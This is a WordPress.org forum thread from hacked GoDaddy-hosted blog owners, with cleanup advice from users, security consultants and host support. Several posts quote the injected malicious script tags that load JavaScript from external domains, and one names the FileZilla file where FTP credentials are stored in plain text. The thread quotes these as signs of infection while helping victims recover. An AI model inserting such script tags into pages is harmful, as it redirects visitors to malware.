WordPress.org

Ready to get started?Download WordPress

Forums

Godaddy wordpress blog hacked (30 posts)

  1. arthur_22
    Member
    Posted 4 years ago #

    My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

    <script src="http://cechirecom.com/js.php"></script>

    I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I'll probably do a clean install later.

    But what worries me is that I am careful about blog security. I always update to the latest WordPress install as soon as it comes out, I always check plugins and only use the bare minimum, I have very strong passwords...

    So...does anyone know if it could be Godaddy servers that have the problem? Or do I need to go through every WordPress hardening tip out there just to avoid this kind of thing?

  2. wpsecuritylock
    Member
    Posted 4 years ago #

    Hello Arthur,

    Same thing here. I just restored a website for a client 2 days ago and this morning it got this new malware. It has the same beginning injected code, but the script in the footer were different.

    We just restored it to yesterday's date to see if that takes care of it.

    Check my blog post to see some things you can try.

    http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Let me know if you need any help.

    Securely yours,

    Regina Smola

  3. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    A few of our customers were affected. Here's what our CISO had to say about it:

    "WordPress is a-ok. Go Daddy is rock solid. Neither were 'hacked,' as some have speculated.

    After an extensive investigation, we can report there was a small group of customers negatively impacted. What happened? Those users had outdated versions of the popular blogging software, set up in a particular way.

    This underscores the importance of installing the latest Web applications, no matter where you are on the Internet. If you use Hosting Connection, automatically update WordPress to version 2.9.2 using the simple 3-step update offered when you log-in.

    And, while we're on the topic of Web security and Best Practices - be sure all your online passwords are unique, secure, and in a safe place."

    If you have questions or you'd like someone to take a look at your WordPress site, please get in touch with our 24/7 support team at http://fwd4.me/MBI

    Alicia

  4. redkathy
    Member
    Posted 4 years ago #

    I was hacked in the April 21 and now April 30. Go Daddy offered NO HELP. Said I would have to pay 150.00 to have them restore my hosting. Claimed it was not their fault. It would be most helpful if Go Daddy offered some assistance rather than denying they had any responsibility in the matter.

  5. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    redkathy,

    We've posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the 'permanent fix'.

    Salem

  6. Chris Reynolds
    Member
    Posted 4 years ago #

    um...I can say, in total honesty, without hesitation, that the two blogs hosted on GoDaddy that I support were both running 2.9.2. I'm interested in what the "particular way" the compromised blogs were set up in...

  7. Hulbert Lee
    Member
    Posted 4 years ago #

    Hi, my blog was also hacked I think. I cannot submit replies to comments like I used to, WordPress runs slower than normal, and the Dashboard looks different when I open it up on Firefox. What do I need to do to restore it back to normal?

  8. Chris Reynolds
    Member
    Posted 4 years ago #

    @Hulbert: if you're on a Linux server, you can restore an earlier version of your files: http://help.godaddy.com/article/5091
    GoDaddy has recommended backing up your database and any uploaded files, deleting your full WP installation, and reinstalling to the most recent version, but I don't see how that is any better than restoring the files (unless there was a stray php file that was infected in the earlier version with potential to infect others). That method would be more complete, however, and may be an option of you're on a Windows server and don't have the option to restore from a previous backup (I've only tried the restore on a Linux server, so I don't know if it's possible or not on Windows, but the help doc only refers to this being possible on Linux).
    http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/

  9. Hulbert Lee
    Member
    Posted 4 years ago #

    @jazzs3quence Thank you for your help. This is an email I got today.

    Hulbert,

    Thanks for your message. We did a scan of your website, and showed malicious malware scripts on your site:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    XML-RPC server accepts POST requests only.<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Can I still use your method to solve this issue?

  10. WeWatch
    Member
    Posted 4 years ago #

    Sorry to be so late jumping in here, but here goes.

    Many of these and other website infections are the result of stolen FTP or other login passwords.

    These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.

    I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn't up-to-date and you can be infected (well, your PC).

    From there the virus learns how to evade detection of the AV software. If you're using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don't have to login each time you want to transfer files, the login credentials are stored in a plain text file.

    For FileZilla, you can see the file here:

    C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanger.xml (user could be Administrator if you're logging into your PC as Administrator)

    All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server which then logs in to the website downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.

    The virus also works by "sniffing" the FTP traffic. Since FTP transmits all data, including username and password in plain text, it's easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc

    Like I said the virus learns how to evade detection of the currently installed anti-virus software so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you're already using one of these, then try one of the other two - it has to be different.

    So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and make sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was cause.

    Second, install a new AV and scan all PCs.

    Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it's free) to find and remove the malscript.

    Fourth, if Google has blacklisted you, you'll have to request a review from the Google Webmaster tools.

    We clean websites for a living so I do know what I'm talking about here.

  11. Frumph
    Member
    Posted 4 years ago #

    Just so GD hosting knows this.

    I have personally helped fix over 23 Godaddy Hosted WordPress Hacked sites in the last 2 weeks.

    "WordPress is a-ok. Go Daddy is rock solid. Neither were 'hacked,' as some have speculated."

    That quote is a little BS to me at this time.

    When users are FTP'ing up their wordpress installation they more then likely not know anything about permissions and did not set anything specific for their hosting.

    I am more prone to think that GoDaddy has a user account directory fail where the scripts can search directory structures to modify PHP files.

    Why do I believe this? Because on one of the GoDaddy accounts for the calamitiesofnature.com site they do *not* use wordpress and had the same hack in their PHP files.

    - Phil

  12. Steve D
    Member
    Posted 4 years ago #

    It's a jungle out there.

  13. blogadmonkey
    Member
    Posted 4 years ago #

    Hello I have just cleared the blog of the malscripts and done the setps recommended by WeWatch.

    My wp admin dashboard is still missmatched, how can I solve this?

  14. derekbanas
    Member
    Posted 4 years ago #

    I posted a ton of solutions specific to a hacked WordPress account on Go Daddy. Don't pay the $150. All they do is go into your File Manager, click on History and then the restore button. This will not work. You have to reinstall themes, sometimes plugins. It's all in the article. Hope that helps if not just ask. Fix WordPress after Hack

  15. helpme11
    Member
    Posted 4 years ago #

    hi, i recieved an email

    WordPress Security Issue - Please Upgrade As Soon As Possible

    i already have the new version of wordpress

    I called godaddy and they said to call wordpress. (no listing for wordpress)

    anyways!!

    and my dashboard is messed up so i clicked on the 4 column and refreshed the page and it corrected the dashboard on the main dashboard but the

    post dashboard
    and so is the comment dashboard

    is messed up still.

    how can i get my dashboard to the normal way so i can continue with my blog.!!

    please. helpme111

  16. helpme11
    Member
    Posted 4 years ago #

    if you respond to this post please dont redirect me to a link where i can get help. thats not cool

    just type the steps here in this forum

    1
    2
    3
    4
    5
    6

    ( i just want to say whoever is responsible for this hack or virus - you could do well with your skills and help improve people lives and not make life frustrating for people. maybe you should look in the mirror and tell yourself you are a good person and do good things with your skills..... ) try it!

  17. helpme11
    Member
    Posted 4 years ago #

    this is the email i received - i took out the phone number because i have no clue if this is a fake or real.. and i dont want to guide someone into a further trap of hell!!

    We are sending you this message because you may not be using the current version of WordPress.

    Many outdated versions of WordPress have been affected by malware. For the security of your site, it is important that you install the latest version of WordPress as soon as possible.

    While it's convenient, the quick upgrade feature in WordPress and in Hosting Connections does not remove old files. We recommend a more thorough backup and upgrade.

    Please follow these detailed instructions to upgrade your version of WordPress and protect your site.

    We appreciate your attention on this critical issue. We are here to help if you have difficulty with the update/upgrade installations. While this "exploitation" is not unique to WordPress or Chadle, it has impacted some of our shared hosting customers and we are making every effort to "spread the word about the fix." Our goal is to help you keep your website safe and secure. If you have questions, please call us 24/7 at .

    Sincerely,

    Hosting Security Team

  18. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    @helpme11
    GoDaddy.com did send out a notification to customers affected by this issue. Although I know you would prefer not to be linked, I want to avoid flooding the forum. For a step-by-step guide to update WordPress, please visit http://fwd4.me/NGN

    Alicia

  19. helpme11
    Member
    Posted 4 years ago #

    can someone from wordpress please respond to how can i fix my dashboard so i can continue with my blog posting..

    my post dashboard and
    comment dashboard is messed up

  20. esmi
    Forum Moderator
    Posted 4 years ago #

    @helpme11: Could you please stick to the one topic!

    http://wordpress.org/support/topic/396524/page/2?replies=37

  21. Chris Reynolds
    Member
    Posted 4 years ago #

    @Hulbert (& everyone else in the same boat)--

    that looks like the same infection, so if you haven't done so already, restoring to a backup from before you were hit would still work. then make sure you've got the right permissions and everything else set up (for what it's worth, though it doesn't seem to be doing much in terms of prevention for some people).

    this post on sucuri.net has a script you can run that might make things a little easier (especially if you keep getting hit by the same thing): http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    http://wpsecuritylock.com has been posting pretty regular updates on all the attacks with complete steps for recovering your site as well.

  22. Chris Reynolds
    Member
    Posted 4 years ago #

    @derekbanas -- looks like your site was hit by the latest wave http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

  23. helpme11
    Member
    Posted 4 years ago #

    NOTE: If you suspect your WordPress site has been affected by a security issue, we recommend upgrading your WordPress installation.

    i already had an upgraded version.

    so should i do it again? and upgrade.

    well i did. i upgraded

    and i still have a messed up dashboard.

    what can i do? please

  24. helpme11
    Member
    Posted 4 years ago #

    i just had a thought. why would someone want to hack our websites. so pointless. what do they gain from it?

    im still waiting for a reply. i wish i was getting a notification everytime there is a reply so i dont have to keep refreshing the page to see if someone replied.

    omg

  25. ClaytonJames
    Member
    Posted 4 years ago #

    Upgrading after you have been hacked does nothing. It's putting a band-aid on a gangrenous leg.

    Sanitize your site and your database first.

    Second, close the holes that have nothing to do with wordpress, such as:
    1) Crappy passwords and sloppy habits
    2) Incorrect file permissions and ownership
    3) Infected and neglected PC's on your home network used to upload files to your web space
    4) Neglecting or ignoring security updates and a lack of regard for learning the basics about caring for a web space
    5) Stop storing FTP and other login credentials in every desktop application that will store them.

    why would someone want to hack our websites. so pointless. what do they gain from it?

    Not pointless at all. "They" want to control your web space for their own use because it's weak and exploitable for some reason. "They" don't care who you are, and "They" are usually robots and scripts. The human factor is a very distant endpoint in most cases.

    You can start by following and reading the information in the links you find listed here:

    http://wordpress.org/support/topic/396449?replies=8#post-1506407

    You can also post a link to one of your hacked sites, and someone (if they dare visit your site) might be able to provide you more info on the "how", or "why" aspect of the problem.

  26. helpme11
    Member
    Posted 4 years ago #

    This is what my friend wrote to me:

    look at wp-content/themes/sem-reloaded/ (anything with that datestamp
    me: where do i go to see that ..
    friend: You'll see base 64 code at the top of each script. It's all been hacked.
    ftp
    It's not part of WP.
    use an FTP client to get to your server

  27. ClaytonJames
    Member
    Posted 4 years ago #

    Go here, read this, try the fix. Help others by reporting back with the results.

    http://wordpress.org/support/topic/396524/page/2?replies=47#post-1506618

  28. AITpro
    Member
    Posted 4 years ago #

    Hmm. Your web host is responsible only up to a certain degree for providing security for your website and then the actual owner is then responsible for his or her own personal website security. I see someone mentioned checking file and folder permissions to make sure they are set correctly. And I see someone else mentioned protecting and securing documents that contain passwords and account info. I also see several other very good procedures and practices that everyone should follow to ensure their own personal website security.

    This is going to seem like self promotion and I guess it is a little bit, but believe it or not I actually really genuinely care and like offering help whenever possible. So anyway I had a client that was hacked on GD a couple of months ago because they had custom coding (it was dirty code) that was being exploited by an XSS script attack. The client had an HTML site and a WordPress website that was being hacked. I came across some .htaccess code that filters and blocks XSS and SQL injection hacking attacks. I then went on to make a simple WordPress plugin to automate handling the .htaccess files simple and easy and added a maintenance mode for my own personal use as a website developer. WordPress is very secure already, but if you leave any doors open, trust me a hacker will be camping in your website living room before you have a chance to blink. I'm going to say it again WordPress is already very secure, but if you want an extra level of protection against XSS or SQL injection hacks then check out the BulletProof Security plugin. It's very simple and very effective. I have tested it in the most hacker infested waters with open website wounds clearly exposed for hackers to see and so far so good. Zero XSS or SQL injection hacked websites that are now using BulletProof Security. Yeah I'm plugging my own plugin LOL. I'm offering some help so take it or leave it. There is nothing that sucks more than having to clean up a website that has been hacked. Ugh.

    Whether or not you use the plugin, one thing that should be standard for any website is an .htaccess file that actually provides security for your website.

  29. anomalousmaterial
    Member
    Posted 4 years ago #

    My blog has been infected 4 times in as many weeks. I run a php script to clean every files on my end and then reinstall wordpress, my theme and all plugins. I change my WordPress key, passwords, FTP password, MySQL password. And it still keeps coming back! And yes, I have GoDaddy! Those people lost a customer.

Topic Closed

This topic has been closed to new replies.

About this Topic